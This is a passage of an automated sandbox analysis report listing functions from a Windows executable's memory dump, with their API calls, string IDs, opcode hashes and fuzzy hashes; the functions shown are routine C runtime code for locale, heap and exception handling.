                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: FileHandleType
                                                                      • String ID:
                                                                      • API String ID: 3000768030-0
                                                                      • Opcode ID: beb213435944418b0a7098a92ff191e542922997e08339a2c1c5f459433f9161
                                                                      • Instruction ID: 008e7871d0f106a805099dd5ee76a33b8b98098ef25b7460ca22b3e4daf850ce
                                                                      • Opcode Fuzzy Hash: beb213435944418b0a7098a92ff191e542922997e08339a2c1c5f459433f9161
                                                                      • Instruction Fuzzy Hash: B3314222E18E5781DBA88B15D5E01786650EB86FB0F681339EB6E873E1CF39E451D340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF61488D7F4, Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                      • String ID:
                                                                      • API String ID: 3548387204-0
                                                                      • Opcode ID: beeffec749e308ffe16c81bd6835906fce2e0c19b55cd94a619cec8060cc76ba
                                                                      • Instruction ID: 869d144f26e8ec77ef8cce40224a96b9e07747dee20bd02d79eb1483eed2e271
                                                                      • Opcode Fuzzy Hash: beeffec749e308ffe16c81bd6835906fce2e0c19b55cd94a619cec8060cc76ba
                                                                      • Instruction Fuzzy Hash: 25117F24E08D0751FAE87BB589D22BC11915F97F30F840834E95DD76C7ED1DF846A262
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A6BD4, Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF61489B426,?,?,?,00007FF61489B756,?,?,?,?,00007FF61488D9C7), ref: 00007FF6148A6BE8
                                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF61489B426,?,?,?,00007FF61489B756,?,?,?,?,00007FF61488D9C7), ref: 00007FF6148A6C55
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: EnvironmentStrings$Free
                                                                      • String ID:
                                                                      • API String ID: 3328510275-0
                                                                      • Opcode ID: f3b4e8fa6f374aedebf4be775062589700bbe60ef5d21c987c82f8d63f2b11fc
                                                                      • Instruction ID: 00a70c36e1fb24d6b64a0905c3fb7f3064e85e36293315148d2ef6c5be0b11b9
                                                                      • Opcode Fuzzy Hash: f3b4e8fa6f374aedebf4be775062589700bbe60ef5d21c987c82f8d63f2b11fc
                                                                      • Instruction Fuzzy Hash: 8401C811B44E5189DEA5EF2568840AA6660FF45FF4F5C8234EE6E577D9DE6CE4408200
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A30C4, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 92a02608e7d5cc3b1a72d0863b405d3436dfc242bcde27ac4506125b857c04a8
                                                                      • Instruction ID: 0f964241a1e94d4315e874232cac1657a5b58e9ca6dc6e508b21264fb2e6de3f
                                                                      • Opcode Fuzzy Hash: 92a02608e7d5cc3b1a72d0863b405d3436dfc242bcde27ac4506125b857c04a8
                                                                      • Instruction Fuzzy Hash: 9421A122E18E4296E681AF15D8C537D2650AF86FB0FA54535F91D873E2CFFCE4418710
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A71C4, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 20ae23c6d6fbef74d82850b3fe84c8418b075488b0b58547aa3f725b1bc3f0b9
                                                                      • Instruction ID: 54e06ca92dbc918c18b07637cec9fe84a7d8ea2734badff0c62d8596ff02cf6e
                                                                      • Opcode Fuzzy Hash: 20ae23c6d6fbef74d82850b3fe84c8418b075488b0b58547aa3f725b1bc3f0b9
                                                                      • Instruction Fuzzy Hash: 6711B232909E4282F780AB11E4C016A63A0FF82BA4F650534E65FC77E1CFBCE8509710
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF61489E56C, Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF61489EF39,?,?,0000E117BC86E4D3,00007FF6148957A9,?,?,?,?,00007FF6148A507E,?,?,00000000), ref: 00007FF61489E5C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 8ba7ba10919a605fa5be2f38f3e1a1ea7ab86b225220a0b5a657c2a20bc7967b
                                                                      • Instruction ID: dcfcf63854538edac8ce8df5ef0fdeb9a78825fb50c7221d76bbe3d30aa6c653
                                                                      • Opcode Fuzzy Hash: 8ba7ba10919a605fa5be2f38f3e1a1ea7ab86b225220a0b5a657c2a20bc7967b
                                                                      • Instruction Fuzzy Hash: 8FF06D54B09E0382FED55A65D8D13B516854FCAF70F4C5434C90EC76C2EE1EE5808220
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614896140, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 97f5d9e79c4b549db1c29c518ace5159bd1b2bc4b2587db1d5d21b7976dc6957
                                                                      • Instruction ID: 56bfa1bd8eacceb8d9c233621251c8f14872d0c5792aa3365cdfd584458a64af
                                                                      • Opcode Fuzzy Hash: 97f5d9e79c4b549db1c29c518ace5159bd1b2bc4b2587db1d5d21b7976dc6957
                                                                      • Instruction Fuzzy Hash: A5F0E562A4CE4241F998AF12E4910BE2292AFC6FE0F888030F58D8B7C3CE2DD0009620
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 00007FF6148AA174, Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1208COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                      • API String ID: 808467561-2761157908
                                                                      • Opcode ID: 90a3e8db653702dc102fce382d09046675bfad15844f4f825879c795a0bc11d1
                                                                      • Instruction ID: cd84abc29101aa823a1acc9e65b37ee131c00ea493ff9a0b24dca456df92b3a4
                                                                      • Opcode Fuzzy Hash: 90a3e8db653702dc102fce382d09046675bfad15844f4f825879c795a0bc11d1
                                                                      • Instruction Fuzzy Hash: 0EB2E572A18A828BE7A58E64D4807F977A1FF85B98F605135DB0A97ED4DF78E500CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A8FF0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00007FF61489ED60: GetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489ED6F
                                                                        • Part of subcall function 00007FF61489ED60: SetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489EE0D
                                                                      • TranslateName.LIBCMT ref: 00007FF6148A905D
                                                                      • TranslateName.LIBCMT ref: 00007FF6148A9098
                                                                      • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF61489C414), ref: 00007FF6148A90DD
                                                                      • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF61489C414), ref: 00007FF6148A9105
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ErrorLastNameTranslate$CodePageValid
                                                                      • String ID: utf8
                                                                      • API String ID: 2136749100-905460609
                                                                      • Opcode ID: 4340c477a7800e2dfc05755ed1494b7b1ef11fe585d5fadc73b97012c0c4bbd3
                                                                      • Instruction ID: 18d2a2f577d4f1ebcdc1c150bc0d7007d826360d8c056fd6354686113c7026bb
                                                                      • Opcode Fuzzy Hash: 4340c477a7800e2dfc05755ed1494b7b1ef11fe585d5fadc73b97012c0c4bbd3
                                                                      • Instruction Fuzzy Hash: F1919E36A0CF4286EBA0AF21D4812B933A4EF46FA4F644531DA5D876E5EFBCE551C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A9A24, Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                      • String ID:
                                                                      • API String ID: 3939093798-0
                                                                      • Opcode ID: 29727b5a06f9503e6d308d159dcfbecb688055babae23bfc4a2a52b6b7345a27
                                                                      • Instruction ID: a02702cd49b24224d30efa480bc09e021f6c28f61d13c82ed9f73dcbd8ffbc25
                                                                      • Opcode Fuzzy Hash: 29727b5a06f9503e6d308d159dcfbecb688055babae23bfc4a2a52b6b7345a27
                                                                      • Instruction Fuzzy Hash: A3716D26B18E528AFB909F64D4906F933A0BF46F64F648835CA1D836E5DFBCE445C350
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF61488E1D4, Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 5ce92d35c3ae318117e97a080d6ff3de53bb9487b5c40c1567133f083e60c596
                                                                      • Instruction ID: 6abf2064de61c52bf5d43585d1d744a79bf4f7a2cf1990a83a994e007608f1d5
                                                                      • Opcode Fuzzy Hash: 5ce92d35c3ae318117e97a080d6ff3de53bb9487b5c40c1567133f083e60c596
                                                                      • Instruction Fuzzy Hash: B2315072609F8286EBA09F60E8903ED7364FB85B64F444439DB4E87AD4EF78D548C714
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A5C10, Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 52f532d2fcfbcfd613475b2a122b270c4be1cca819825188e743e4443859037c
                                                                      • Instruction ID: a01b27c0e96640f7857556994a969b65ea3546379b4f2fc7b53cbb0216c9af63
                                                                      • Opcode Fuzzy Hash: 52f532d2fcfbcfd613475b2a122b270c4be1cca819825188e743e4443859037c
                                                                      • Instruction Fuzzy Hash: 36A1D622B19E8181EAA0CB2194442BA73A0FF46FF4F605535EE5D87BE4DFBCD4858310
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF61489543C, Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 69eade4bf76073c3101b10d77e1a707967cd7743cf955b342fad749c27f6aff3
                                                                      • Instruction ID: ecd082c79c503374f7120469c7729be892d2bc0a2881ce69631dbe0b39549b5f
                                                                      • Opcode Fuzzy Hash: 69eade4bf76073c3101b10d77e1a707967cd7743cf955b342fad749c27f6aff3
                                                                      • Instruction Fuzzy Hash: 23316736614F8286DBA0DF25E8902AE73A4FB85B64F500135EB9D83BA5EF3CD545CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A2864, Relevance: 7.8, APIs: 5, Instructions: 321fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite$Console
                                                                      • String ID:
                                                                      • API String ID: 786612050-0
                                                                      • Opcode ID: 4d24b88d8f899e9c8aba7e75e393f451e767afcfcb2658582ae6d912c175b30b
                                                                      • Instruction ID: b1c98feba609851d523f5c860ffcd6c109467939d16958073f3c52b625e19490
                                                                      • Opcode Fuzzy Hash: 4d24b88d8f899e9c8aba7e75e393f451e767afcfcb2658582ae6d912c175b30b
                                                                      • Instruction Fuzzy Hash: 41D10376B08E918AE751CF64D4841ED77B1FB46BA8B640136CE4E87BE9DE78D11AC300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614898040, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 317COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: memcpy_s
                                                                      • String ID: ios_base::failbit set
                                                                      • API String ID: 1502251526-3924258884
                                                                      • Opcode ID: eb9087705620f05042c34dfc2556d76d6eed7c1a18d44c8083b321096b5a3d76
                                                                      • Instruction ID: 5295a14e28a7612526377d99d3a1dfa22039a121130f2b5d09d6ff1fb86446fc
                                                                      • Opcode Fuzzy Hash: eb9087705620f05042c34dfc2556d76d6eed7c1a18d44c8083b321096b5a3d76
                                                                      • Instruction Fuzzy Hash: 0AC1C272B38E8787EB64CF59E18466AB791FB95B94F448135DB4A83744DE3EE800CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148841F0, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                      • String ID: %
                                                                      • API String ID: 3668304517-2567322570
                                                                      • Opcode ID: d950214c658ec064b66ba31d4fabe73275801fd98454d10ba848113b9fe919e3
                                                                      • Instruction ID: 27b803e345a275c426e3609af96cdbb114626c196d9ecb3c44acb240e69e97a6
                                                                      • Opcode Fuzzy Hash: d950214c658ec064b66ba31d4fabe73275801fd98454d10ba848113b9fe919e3
                                                                      • Instruction Fuzzy Hash: 1A122223B08A8689FB65CB69D4903FD67A1EB46FA8F044139DE4D97B85EF3CD4419300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614883370, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 492COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                      • String ID: %
                                                                      • API String ID: 3668304517-2567322570
                                                                      • Opcode ID: 76023c01a37072f665d79ec20026fff7d8770a48b4f734ba3d64f2672f55a8d6
                                                                      • Instruction ID: 1a329a8b11c5d555910de608f873f082515509e03f4a734900ac4d704ebe3321
                                                                      • Opcode Fuzzy Hash: 76023c01a37072f665d79ec20026fff7d8770a48b4f734ba3d64f2672f55a8d6
                                                                      • Instruction Fuzzy Hash: DE121112B08E868AFB65CFA5E4903FD63A1EB56BA8F404131DE4D97B99DF3DE4419300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148958EC, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 208COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Wcsftime$_invalid_parameter_noinfo
                                                                      • String ID: ios_base::failbit set
                                                                      • API String ID: 4239037671-3924258884
                                                                      • Opcode ID: 7f2b8a521c9dc2d0c2b7b5c389024ad60d0e567c44083a24752ddcb01bea161a
                                                                      • Instruction ID: 205b322180be4909058abc6f46efb622f0b91c50f07c5554b34190e711aa3f01
                                                                      • Opcode Fuzzy Hash: 7f2b8a521c9dc2d0c2b7b5c389024ad60d0e567c44083a24752ddcb01bea161a
                                                                      • Instruction Fuzzy Hash: 89818C32A04E5186EBA48E25D4C137D27A4FB86FB8F144636EE5E97BD8CF39D0418310
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A0FD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InfoLocaletry_get_function
                                                                      • String ID: GetLocaleInfoEx
                                                                      • API String ID: 2200034068-2904428671
                                                                      • Opcode ID: 28ded2e3510afebdaa426ad8ef9b015c35cf05c218bb6d8b2a43254175200813
                                                                      • Instruction ID: c4e38f43ff722376c3847e486e62de487c5831c058e1b034e67b62103a3b2b55
                                                                      • Opcode Fuzzy Hash: 28ded2e3510afebdaa426ad8ef9b015c35cf05c218bb6d8b2a43254175200813
                                                                      • Instruction Fuzzy Hash: A9018125B08F8186E7809F52B4800AAA760AF96FE4FA88435DF5C93BF9CE7CD5418340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A94A4, Relevance: 4.7, APIs: 3, Instructions: 169COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00007FF61489ED60: GetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489ED6F
                                                                        • Part of subcall function 00007FF61489ED60: SetLastError.KERNEL32(?,?,?,00007FF614894207,?,?,00000000,00007FF6148A176C), ref: 00007FF61489EE0D
                                                                      • GetLocaleInfoW.KERNEL32 ref: 00007FF6148A9510
                                                                        • Part of subcall function 00007FF6148A5898: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6148A58B5
                                                                      • GetLocaleInfoW.KERNEL32 ref: 00007FF6148A9559
                                                                        • Part of subcall function 00007FF6148A5898: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6148A590E
                                                                      • GetLocaleInfoW.KERNEL32 ref: 00007FF6148A9624
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InfoLocale$ErrorLast_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3644580040-0
                                                                      • Opcode ID: 71ad9deee62cbc822561fd8153de0140f12a8ea3c686a29a39fc2103c5d89094
                                                                      • Instruction ID: 559c268ff2f20bae7a674dbfbdacc10ae4ae6cd793e6c08dd6513a1b75b3dacc
                                                                      • Opcode Fuzzy Hash: 71ad9deee62cbc822561fd8153de0140f12a8ea3c686a29a39fc2103c5d89094
                                                                      • Instruction Fuzzy Hash: FD618B36A0CA4286EBB48E15D5D12B973A0FF86B60F648535D79ED36E0DEBCE4508700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF61489F070, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 248COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
